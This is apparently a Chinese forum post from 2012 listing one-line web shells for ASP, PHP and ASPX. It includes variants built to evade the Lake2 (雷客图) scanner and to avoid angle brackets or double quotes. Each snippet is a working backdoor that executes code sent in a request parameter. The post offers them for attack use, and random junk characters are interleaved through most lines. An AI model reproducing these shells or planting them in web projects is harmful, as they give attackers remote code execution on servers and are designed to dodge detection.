asp一句话 <%execute(request("1"))%>
2 e. X* J$ a2 f4 v$ T( Q
: n5 U8 z d9 q; O# }% Y2 N) a0 q% U& G+ Wphp一句话 <?php eval($_POST[1]);?> - C- \6 }: T E) T7 |9 o8 R1 Z
- p* [0 a1 K4 [& R5 y
aspx一句话
# j. _( O1 s4 t6 W8 M0 X$ }/ g& K7 \& K+ `% m8 o. p
<script language="C#" runat="server">( r: L' B; P; g9 O2 A6 q# [* C
9 b& p S6 m2 N# |0 l% [
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
" V0 p! `; z0 `" R! g2 E5 S
. a% ^ c+ h/ e1 J. A- P</script>9 J t) G/ \. d( n$ y$ d* s; A
/ p A* s3 C, y6 V) ]4 j
可以躲过雷客图的一句话。
a2 |$ F2 @+ D4 Z
+ j9 ~* f0 X% X6 ] <%) g2 Y8 O6 N2 X4 p1 I+ k
9 M6 B' e$ u% A! {3 v
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
- x) W) G7 Y8 Z/ k
, A3 {* T+ g z: L+ l. F) Q7 B6 R ms.Language="VBScript"
% D; w! Y# A) R. v# q
% k' |% f, ?' l7 R% a ms.AddObject "Response", Response
+ y; T! P6 f. r8 `
$ H3 [- E. J7 N ] ms.AddObject "request", request: B! o# K- Z# i/ j" h
* j5 @7 ~9 G6 A; F ms.ExecuteStatement("ev"&"al(request(""1""))")
+ N9 e" y, k& A! h* z" J) D/ P. P. ^8 y+ t6 A
%>
) n4 o- e1 O8 c$ U5 }' s+ [
1 n2 G0 F3 l; |1 s2 N+ u7 p 不用'<,>'的asp一句话9 r6 C+ G1 i8 {* ?* B, [( M' N' Z4 v! }
! f- T% ]0 ]1 A# n. O7 X
<script language=VBScript runat=server>execute request("1")</script>
' `9 L! v' v: o0 \$ R2 V0 z7 D
; u: A) R' I8 d$ q) V 不用双引号的一句话。
& ^* A4 y- ^) n8 T/ m0 r$ v) H, C' {9 p. ?% P: Y0 @2 I& b5 X4 V N
<%eval request(chr(35))%>' f! A Z6 b1 x: o
|
发表于 2012-9-23 14:36:09
收藏
支持
反对